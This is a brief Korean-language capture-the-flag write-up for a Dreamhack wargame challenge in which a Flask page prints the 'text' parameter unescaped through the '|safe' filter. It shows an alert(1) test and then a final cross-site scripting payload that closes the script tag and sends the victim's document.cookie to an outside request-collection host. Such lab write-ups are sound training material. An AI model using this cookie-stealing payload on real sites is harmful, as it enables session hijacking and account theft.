https://dreamhack.io/wargame/challenges/1671?writeup_page=4
매우 정직한 문제다.
/test.html 페이지에서 ?text로 입력한 값을 {{test|safe}}로 화면에 출력한다. safe를 사용했기 때문에 자바스크립트 코드를 사용할 수 있다.
http://host8.dreamhack.games:21728/test?text=dolephine 이렇게 입력을 하게 되면 아래의 소스 코드처럼 “dolephine” 문자가 들어가게 된다.
“dolephine” 대신, 자바스크립트를 삽입하면 문제를 해결할 수 있다. 아래의 예시를 보여준다.
http://host8.dreamhack.games:21728/test?text=a;</script><script>alert(1)</script><script>b
alert(1)이 아주 깔끔하게 들어갔다. 이를 조금 수정하여 /report 페이지에서 페이로드를 전송하면 플래그를 획득할 수 있다.
a`;</script><script>location.href='https://akkdbba.request.dreamhack.games?asd='+document.cookie</script><script> `b
dolephine homepage 